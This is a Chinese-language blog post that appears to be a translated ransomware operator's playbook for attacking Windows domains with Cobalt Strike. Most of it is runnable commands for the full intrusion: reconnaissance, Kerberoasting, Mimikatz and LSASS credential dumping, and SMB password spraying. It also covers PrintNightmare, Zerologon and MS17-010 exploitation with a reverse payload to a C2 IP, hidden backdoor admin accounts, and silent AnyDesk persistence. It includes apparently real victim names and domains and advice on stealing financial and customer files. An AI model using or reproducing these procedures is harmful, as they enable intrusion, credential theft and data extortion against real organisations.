Administrator
发布于 2024-11-11 / 8 阅读
0

CobaltStrike攻击手册

权限提升和信息收集

初步侦查

1.1搜索公司收入

找到公司网站 在Google上搜索:公司名称 + 收入 (mycorporation.com + revenue) (“mycorporation.com” “revenue”) 检查超过1个网站,如果可能的话 (owler, manta, zoominfo, dnb, rocketrich)

1.2. 确定管理员和用户

1.3. shell whoami <===== 我是谁

1.4. shell whoami /groups --> 我的权限(如果机器人来自蓝色屏幕)

1.5.1. shell nltest /dclist: <===== 域控制器 net dclist <===== 域控制器

1.5.2. net domain_controllers <===== 这个命令将显示域控制器的IP地址

1.6. shell net localgroup administrators <===== 本地管理员

1.7. shell net group /domain “Domain Admins” <===== 域管理员

1.8. shell net group “Enterprise Admins” /domain <===== 企业管理员

1.9. shell net group “Domain Computers” /domain <===== 域内计算机总数

1.10. net computers <===== ping所有主机,并显示IP地址。

接下来我们根据获得的信息进行行动,例如,如果有3000台设备,最好先执行Kerberoast攻击,因为在两个小时内,机器在抓取共享文件时可能会掉线等。

网络共享资源获取

共享资源获取的两种情况:

当我们寻找可以放置有效载荷的位置时。在这种情况下,我们只需要具有写入权限的共享资源(即,管理员共享但没有读取权限的共享)。为此,我们可以执行:

powershell-import /home/user/work/ShareFinder.ps1

psinject 1234 x64 Invoke-ShareFinder -CheckAdmin -Verbose | Out-File -Encoding ascii C:\ProgramData\sh.txt

当我们寻找将在第二阶段提取的信息时,此时需要具有读取权限的共享资源。我们使用域管理员的令牌来启动数据提取(不同的管理员可能有不同的共享访问权限),并使用以下命令获取共享资源:

powershell-import /home/user/work/ShareFinder.ps1

psinject 5209 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shda.txt

接下来,研究获取到的共享资源,我们关注的内容包括:

  • 财务文件

  • 会计资料

  • IT相关文件

  • 客户信息

  • 项目资料

具体取决于我们的目标关注的内容。然后,我们将提取筛选出的数据,详细信息将在第二部分中说明。

Kerberoast攻击

目标是获取管理员的哈希值,以便后续进行暴力破解.

方法一:

powershell-import /home/user/work/Invoke-Kerberoast.ps1

psinject 4728 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -Encoding UTF8

方法二:

execute-assembly /home/user/work/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt

execute-assembly /home/user/work/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt

最终在 C:\ProgramData\ 目录中生成的文件中可能包含哈希值,下载这些文件,并在成功的情况下将哈希值发送给团队领导进行暴力破解。

Mimikatz

从内存中提取明文密码

  1. privilege::debug – 检查是否具备相应权限。

  2. log nameoflog.log – 启动日志记录功能。

  3. sekurlsa::logonpasswords – 输出存储在计算机上的所有密码,以明文形式显示。

基本命令

privilege::debug
sekurlsa::logonpasswords
token::elevate
lsadump::sam

从域控制器同步哈希

lsadump::dcsync /user:Administrator -pass [密码]
sekurlsa::pth /user:[用户名] /domain:[域] /ntlm:[哈希] /run:cmd

在 Cobalt Strike 中使用 Mimikatz

getsystem
hashdump
logonpasswords

使用 Beacon

beacon> make_token domain\user password - 以用户的令牌身份运行
beacon> pth domain\user NTLM - 使用用户的 NTLM 哈希
beacon> rev2self - 还原会话到初始状态
beacon> dcsync domain.com - 从域中获取所有哈希(需要域管理员权限)

如果找到登录名和哈希:

pth Domain\Admin pass(以哈希形式)
shell dir \\ip或主机名\c$

示例:

EliAdmin:1001:aad3b435b51404eeaad3b435b51404ee:b0059c57f5249ede3db768e388ee0b14:::
pth ELC\EliAdmin b0059c57f5249ede3db768e388ee0b14

如果找到登录名和密码:

make_token Domain\Admin Pass
rev2self - 移除令牌

读取 LSASS

  1. 从 GitHub 下载 Mimikatz 最新版本。

  2. 以管理员身份打开 CMD

基本命令:

C:\work\mimikatz\win32 > mimiKatz
privilege::debug
sekurlsa::minidump lsass.dmp — 从转储文件中工作
log — 将输出记录到日志文件

保存的信息:

  1. 明文登录名和密码。

  2. 如果没有密码,保存 NTLM 和 SHA1(后续可解密或进行哈希攻击)。

Windows 2003 的 LSASS 转储

在 Windows 2003 上,无法通过任务管理器转储 lsass.exe。

  1. 打开“任务管理器”,选择“进程”,找到 lsass.exe,右键点击并选择“转储进程”。

  2. 转储文件位于:C:\user\%%user%%\AppData\Local\Temp\lsass.DMP

下载转储的任意方式。

使用 Procdump

  1. 下载 procdump.exe 或 procdump64.exe。

  2. 运行命令

procdump.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp
procdump64.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp

3.下载 lsass.dmp 文件并删除 lsass.dmp 和 procdump。

Zerologon 利用

使用 Mimikatz 执行 Zerologon 攻击:

mimikatz lsadump::zerologon /target:[controller.domain.local] /account:[controller]$ /exploit
mimikatz lsadump::zerologon /target:DC01.contoso.com /account:DC01$ /exploit

Procdump 使用示例

在 Mimikatz 中使用 Procdump:

lsadump::mimidump LSAdump.dmp
log
sekurlsa::logonpasswords
exit

LSASS 提取方法

通过 Cobalt Strike
  1. getsystem

  2. 使用以下命令创建 LSASS 转储((PID 是 lsass.exe 的进程 ID):

shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full

在远程机器上执行

使用 WMIC:

shell wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"

使用 PsExec:

remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full

通过 RDP
  • 打开任务管理器,找到 lsass 进程。

  • 右键点击 lsass 进程,选择“创建转储文件”。

  • 将生成的转储文件下载到本地计算机。

检查域组策略文件中的保存密码

execute-assembly /home/user/work/Net-GPPPassword.exe

没看懂。

SMB 自动暴力破解

输入数据

进行此攻击所需的输入仅为密码:

  • 从 CharpChrome 浏览器中提取的密码

  • 从 SeatBelt 提取的密码

  • 在网络内部工作过程中提取的密码(如通过 Mimikatz)

  • 其他发现的密码,例如在文件中记录的密码

如果提取的密码数量少于可以启动的暴力攻击数量,可以从以下常见企业密码列表中添加:

  • Password1

  • Hello123

  • password

  • Welcome1

  • banco@1

  • training

  • Password123

  • job12345

  • spring

  • food1234

还建议使用基于季节和当前年份的密码列表。考虑到密码每三个月更改一次,可以生成一个备用列表。例如,在 2020 年 8 月,可以创建如下列表:

  • June2020

  • July2020

  • August20

  • August2020

  • Summer20

  • Summer2020

  • June2020!

  • July2020!

  • August20!

  • August2020!

  • Summer20!

  • Summer2020!

这些密码符合 Active Directory 的三项或四项要求,通常足以供用户设置。

域管理员场景

收集域管理员列表:

shell net group "domain admins" /dom

将结果保存到 admins.txt 文件中。

将文件上传到主机的 C:\ProgramData 文件夹。

查询域账户锁定策略(防止暴力破解):

beacon> shell net accounts /dom

关注 Lockout threshold 参数,通常会有一个特定的数值,作为暴力破解的防护参数(本例中为 Never,意味着未启用保护)。

在脚本中指定域:

$context = new-object System.DirectoryServices.ActiveDirectory.DirectoryContext("Domain","shookconstruction.com")

导入并运行脚本:

powershell-import /home/user/work/scripts/Invoke-SMBAutoBrute.ps1

执行:

psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Hello123, Welcome1, password, banco@1, training, Password123, spring, food1234, job12345, 1qazXDR%+"

如果未获得积极结果,可以在稍后时间重复尝试(建议在下一次尝试前将 Lockout duration 参数乘以二),使用新的密码列表。脚本结束时将通过 Beacon 输出消息。(还是蛮有耐心的

PrintNightmare (打印噩梦)

描述:

1.1https://github.com/calebstewart/CVE-2021-1675


这是一个新近曝光的漏洞,利用它可以创建本地管理员账户,非常有用,如果你获得了普通用户权限的代理。

在代理上进行以下操作:

  1. 导入脚本: 导入文件 CVE-2021-34527.ps1

powershell-import //导入文件 CVE-2021-34527.ps1

2.创建用户: 创建一个名为 HACKER、密码为 FUCKER 的新用户,并将其添加到本地管理员组:

powershell Invoke-Nightmare -NewUser "HACKER" -NewPassword "FUCKER" -DriverName "Xeroxxx"

3.启动代理: 以新创建的本地管理员身份启动代理:

spawnas COMPNAME\HACKER FUCKER https //这里替换为监听器的名称

4.也有可能获得 SYSTEM 权限的代理,导入后执行:

Invoke-Nightmare -DLL "\polniy\put\do\payload.dll"

MS17-010

描述:
Windows XP 和 Windows 2003 没有 MS17-010 补丁。
Windows 7、8、10,2008、2012、2016 可能没有打补丁,因此可能存在漏洞。在攻击它们时,为了提高成功利用的几率,需要提供域用户的登录名和密码。

首先,获取 AD,ping 目标 IP 地址。
IP 地址应在一行中以空格分隔。

1. 在 Cobalt Strike 中启动代理:

在 Cobalt Strike 控制台输入命令:

socks 18585

2. 扫描是否存在漏洞:

在 Metasploit 控制台输入以下命令:

use auxiliary/scanner/smb/smb_ms17_010
set Proxies socks4: 172.98.192.214:18589
set threads 10
set RHOSTS 10.0.0.10 10.0.0.20 10.0.0.30 10.0.0.40

在攻击 Windows 7、8、10、2008、2012、2016 时,额外指定:

set smbuser 登录名
set smbdomain 域名
set smbpass 密码

然后运行:

run

说明:

  • auxiliary/scanner/smb/smb_ms17_010 — Metasploit 的辅助模块,扫描目标是否存在漏洞;

  • set Proxies socks4: 172.98.192.214:18589 — 指定 Metasploit 使用代理访问目标网络;

  • 172.98.192.214 — Cobalt Strike 服务器的 IP;

  • 18589 — 端口;

  • set threads 10 — 使用 10 个线程;

  • set RHOSTS — 所有目标 IP 地址,以空格分隔;

  • run — 启动模块。

结果:

[*] Scanned 10 of 44 hosts
[+] 10.0.0.200:445 - Host is VULNERABLE to… <== 漏洞主机

3. 利用漏洞获取 meterpreter 会话

使用以下命令:

use exploit/windows/smb/ms17_010_psexec
set Proxies socks4: 172.98.192.214:18589
set RHOSTS 10.0.0.10 10.0.0.20 10.0.0.30 10.0.0.40
set payload windows/meterpreter/bind_tcp
set verbose 1 
run

如果会话未打开,则更改有效负载文件格式:

set target 1 
run
set target 2 
run
set target 3 
run

更换有效负载,依次尝试打开会话不同格式的有效负载文件:

set payload windows/meterpreter/bind_tcp_rc4 

也尝试所有文件格式。

如果还是不成功,尝试另一种方法,推送会话到 Cobalt Strike:

set payload windows/meterpreter/reverse_https
set lport 443
set lhost 172.98.192.214   (Cobalt Strike 的 IP)

再次尝试所有文件格式。

模块说明:

  • use exploit/windows/smb/ms17_010_psexec — Metasploit 模块,向目标投送有效负载并打开会话;

  • set payload windows/meterpreter/bind_tcp — 指定使用的有效负载;

  • target 1 是 ps1(在 Windows XP 和 Windows 2003 上 PowerShell 不工作,适用于较新版本的 Windows);

  • target 2 是 exe;

  • target 3 是 mof。

结果: 应该会出现会话。在 Metasploit 中可通过命令 sessions 进行检查。

获取会话后,尝试获取域管理员账号的登录名和密码: 进入会话,输入命令 sessions 1(1 是会话编号):

getpid — 获取会话进程的 PID。如果有 PID,说明会话存活。
hashdump — 保存哈希值。

提取密码和哈希:

load mimikatz — 在目标上加载 mimikatz。
Wdigest	- 尝试获取用户输入的密码;
kerberos	- ?
livessp		- ?
ssp		- 通过 RDP 输入的密码;
tspkg		- ?
background 	- 将会话转到后台(可通过 `sessions 1` 再次打开)。

如果会话无法成功获取,尝试创建管理员账号并通过 RDP 连接。

4. 利用漏洞执行命令(创建用户并将其添加到本地管理员组)

使用以下命令:

use auxiliary/admin/smb/ms17_010_command
set Proxies socks4: 172.98.192.214:18589
set RHOSTS 10.0.0.200 10.0.0.37 10.0.0.200 10.0.0.81
set command net user OldAdmin 1Q2w3E4r5T6y /add
set verbose 1
run
set command net localgroup Administrators OldAdmin /ADD
run

说明:

  • use auxiliary/admin/smb/ms17_010_command — Metasploit 的辅助模块,使用管理员权限在目标上执行指定命令并将结果返回到 Metasploit 控制台;

  • set command ... — 指定要执行的命令;

  • net user OldAdmin 1Q2w3E4r5T6y /add — 创建用户;

  • net localgroup Administrators OldAdmin /ADD — 将用户添加到本地管理员组;

  • set verbose 1 — 输出更详细的信息。如果某些操作失败,发送给更有经验的人。

结果: 指定的命令应该会成功执行。可以通过输出中的 The command completed successfully 来确认命令已成功执行。

然后通过 RDP 连接

选项 1 — 启动加密有效负载(可能获取会话)

简单地通过任何方式上传文件并执行。

选项 2 — 获取 lsass.exe 进程的转储并从中提取凭据。

有关如何操作,请参考 Mimikatz 的文档。

RouterScan

Zerologon

描述:
Zerologon 是一个利用 Windows 域控制器漏洞的工具,可以通过两种方式进行利用:

  1. 通过 Mimikatz。

  2. 通过 Cobalt Strike 中的脚本连接。

使用步骤:

  1. 下载脚本:
    从以下链接下载 Zerologon 的脚本: ZeroLogon-BOF GitHub

  2. 在 Cobalt Strike 中连接脚本:
    像往常一样导入脚本,地址为:

ZeroLogon-BOF/dist/zerologon.cna

获取域名:
使用以下命令获取域名:

net domain

例如:domain.local

运行漏洞利用:
执行以下命令启动漏洞利用:

zerologon iunderstand domain.local

这里的 iunderstand 是一个停止词。利用此漏洞时会重置密码,这个操作可能导致域控制器功能受损,因此建议最后使用。

成功后处理:
如果成功,您将获得如下信息:

Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync

进行 DCSync:
执行以下命令以同步域控制器:

dcsync domain.local

如果一切顺利,您将获得 NTDS 数据。

固定

在获得 SYSTEM 权限后,可以使用 AnyDesk 和 Atera 工具进行远程访问。

安装 AnyDesk

Function AnyDesk {
    mkdir "C:\ProgramData\AnyDesk"
    
    # 下载 AnyDesk
    $clnt = new-object System.Net.WebClient
    $url = "http://download.anydesk.com/AnyDesk.exe"
    $file = "C:\ProgramData\AnyDesk.exe"
    $clnt.DownloadFile($url, $file)

    # 安装 AnyDesk
    cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent

    # 设置密码
    cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password

    # 创建本地管理员账户
    net user oldadministrator "qc69t4B#Z0kE3" /add
    net localgroup Administrators oldadministrator /ADD

    # 隐藏用户
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f

    # 获取 AnyDesk ID
    cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}

AnyDesk

使用说明

  1. 在 PowerShell ISE 中以管理员身份运行上述代码。

  2. 获取并保存 AnyDesk ID。

  3. 在另一台机器(如独立服务器、VPS 或虚拟机)上下载 AnyDesk,输入刚才保存的 ID。

  4. 选择 Console Account,输入密码:J9kzQ2Y0qO

  5. 使用本地管理员或域账户登录,享受 AnyDesk 的便利。

固定Atera

Atera 的固定步骤

  1. 访问网站 https://app.atera.com

  2. 注册账户。

  3. 点击页面顶部的“Install agent”(安装代理)。

  4. 下载代理并上传到机器人上。

  5. 启动代理:

shell УСТАНОВЩИК АГЕНТА.msi

6.在网站的“Devices”(设备)部分应该会显示访问权限。

7.删除代理安装程序。

最后的侦察

查找信任关系

shell nltest /domain_trusts /all_trus

提取 NTDS

查找备份(Backup)和网络附加存储(NAS,NetScan

猎取管理员

第一部分
询问域

beacon> shell net group "domain admins" /domain
    任务已指派给 beacon:net group "domain admins" /domain
    主机已回连,发送:64 字节
    接收输出:
请求将在 DOMAIN.com 域的域控制器上处理。
组名         Domain Admins
备注         指定的域管理员
成员
----------------------------------------------------------------
Administrator            ClusterSvc               createch                  
Createch2                d01adm                   da9adm                   
p01adm                   PMPUser                  q01adm                   
repl                     s01adm                   Sapserviced01           
SAPServiceDA9            sapservicep01            SAPServiceQ01           
sapservices01            SAPServiceSND            SAPServiceSOL           
services                 services2                sndadm                   
soladm                   somadm                   staseb                    
telnet                   Johnadm               
命令成功完成。

查看输出,筛选出服务账户和非服务账户。
上面列出的服务账户包括:

  • SAPServiceDA9

  • services

  • telnet

  • services2

  • Sapservice01 ...

哪些账户最有可能适合我们:

  • staseb

  • Johnadm

将它们记录下来。
可以查看它们在 adfind_persons.txt 中的身份,或使用命令:

shell net user staseb /domain

例如:

beacon> shell net user ebernardo /domain
    任务已指派给 beacon:net user ebernardo /domain
    主机已回连,发送:57 字节
    接收输出:

用户名                    ebernardo
全名                      Eric Bernardo
备注                      
用户的备注               
国家/地区代码           (null)
账户激活                 是
账户到期                 从不

上次密码设置            2020-12-08 12:05:15 PM
密码到期                 2021-06-06 12:05:15 PM
密码可更改              2020-12-08 12:05:15 PM
密码要求                是
用户可以更改密码        是

允许的工作站            全部
登录脚本                  
用户配置                  
主目录                    
上次登录                  2021-01-29 2:25:24 PM

允许的登录时间          全部

本地组成员资格          *Administrators       *Remote Desktop Users
                         *Server Operators     
全局组成员资格         *US Users             *Great Plains Users   
                         *Citrix Group         *VPN Users Saskatoon 
                         *Admins - AD Basic    *VPNUsersHeadOffice   
                         *Executives           *All Winnipeg Staff   
                         *Scribe Console Users *Domain Admins       
                         *VPN Users USA        *Workstation.admins   
                         *Domain Users         
命令成功完成。

查看谁是这个账户,属于多个组,备注列中有时会写明其身份,例如工程师、系统管理员、支持人员或业务顾问。
在“上次登录”中,账户应为活跃状态——即“上次登录”是在今天、昨天或本周,而不是一年前或“从不”。
如果在询问后仍不清楚其身份,请查看 adfind 并检查 LinkedIn(下文有相关部分)。

通过这种方式,从域管理员中筛选出 2-3 个账户,询问每个账户并了解他们的身份。最终应该能找到 1-2-3 个可能的管理员账户。

我们变成家庭分析师 - 查看 Adfind。
我们关注的是 adfind_groups 文件。
进入后,看到大量文本。
按下 Ctrl + F(Notepad2 / Geany),输入:

dn:CN=

然后点击“在当前文档中查找所有”。

输出大致如下(我剪切了一部分,仅保留了 5 行,通常这里有 100 到 10000 行):

adfind_groups:3752: dn:CN=SQLServer2005SQLBrowserUser$TRUCAMTLDC,CN=Users,DC=domain,DC=com
adfind_groups:3775: dn:CN=clubsocial,CN=Users,DC=domain,DC=com
adfind_groups:3800: dn:CN=Signature Intl-Special,OU=Groupes,OU=Infra,DC=domain,DC=com
adfind_groups:3829: dn:CN=FIMSyncAdmins,CN=Users,DC=domain,DC=com
adfind_groups:3852: dn:CN=GRP-GRAPHISTE,OU=FG-GRP,DC=domain,DC=com

因此,我们提取了 Active Directory 的组。
我们感兴趣的是什么,以及为什么要这样做——在 Active Directory 中一切都是结构化的,在美国和欧盟网络中,一切都做得尽可能清晰透明,有注释、标记、说明等等。
我们关注的是从事 IT、管理和局域网工程的组。
通过搜索,我们找到以下行:

adfind_groups:3877: dn:CN=IT,CN=Users,DC=domain,DC=com

我们在 adfind_Groups.txt 中查看第 3877 行,看到如下内容:

dn:CN=IT,CN=Users,DC=domain,DC=com
>objectClass: top
>objectClass: group
>cn: IT
>description: Informatique
>member: CN=MS Surface,OU=IT,DC=domain,DC=com
>member: CN=Gyslain Petit,OU=IT,DC=domain,DC=com
>member: CN=ftp,CN=Users,DC=domain,DC=com
>member: CN=St-Amand\, Sebastien\, CDT,OU=IT,DC=domain,DC=com

用户 ftp 和 MS Surface 被忽略,而 Gyslain Petit 和 St Amand Sebastien 则被纳入考虑。
接下来,打开 ad_users.txt,输入 Gyslain Petit,找到用户的以下信息:

dn:CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Gyslain Petit
>sn: Petit
>title: Directeur, technologie de l'information
>physicalDeliveryOfficeName: 217
>givenName: Gyslain
>distinguishedName: CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com
>instanceType: 4
>whenCreated: 20020323153742.0Z
>whenChanged: 20201212071143.0Z
>displayName: Gyslain Petit
>uSNCreated: 29943
>memberOf: CN=GRP_Public_USA_P,OU=Securite-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=GRP-LDAP-VPN,OU=FG-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=IT Support,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=Directeurs,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=GRP-IT,OU=FG-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=Signature Canada,OU=Groupes,OU=Infra,DC=trudeaucorp,DC=com
>memberOf: CN=EDI,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=IT,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=TRUDEAU-MONTREAL,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=everyone,CN=Users,DC=trudeaucorp,DC=com
>uSNChanged: 6908986
>department: IT Manager

查看标题,发现这是信息技术总监。似乎很理想,但总监不一定拥有密码,而某个系统管理员可能就有。
因此对第二个用户进行类似的操作。在自己的记录中做笔记,记录来自 adfind 的登录名(sAMAccountName)大致如下:

>sAMAccountName: gpetit

gpetit - IT 总监
staseb - 某某某

如果运气好,职位会直接写出来。在我的测试案例中,如下所示:

adfind_persons:280: >title: Responsable, logistique direct import
adfind_persons:1836: >title: Chef des services techniques
adfind_persons:1955: >title: Chef comptable
adfind_persons:4544: >title: Directeur, technologie de l'information
adfind_persons:6064: >title: Présidente
adfind_persons:6191: >title: Chargée de projets, mise en marché
adfind_persons:6285: >title: Directrice marketing
adfind_persons:6848: >title: Coordonnatrice à l'entretien

总监、技术经理、系统管理员、首席执行官、首席信息官、支持人员……
如果有任意一个有联系且还活着,直接在下面建立交互,并提及联系请求。

小结:
在寻找合适的管理员时,关注有效的账户,标记那些在 IT 部门工作、负责网络、安全和系统支持的账户,最理想的情况是能够直接与这些账户交互或在 LinkedIn 上联系。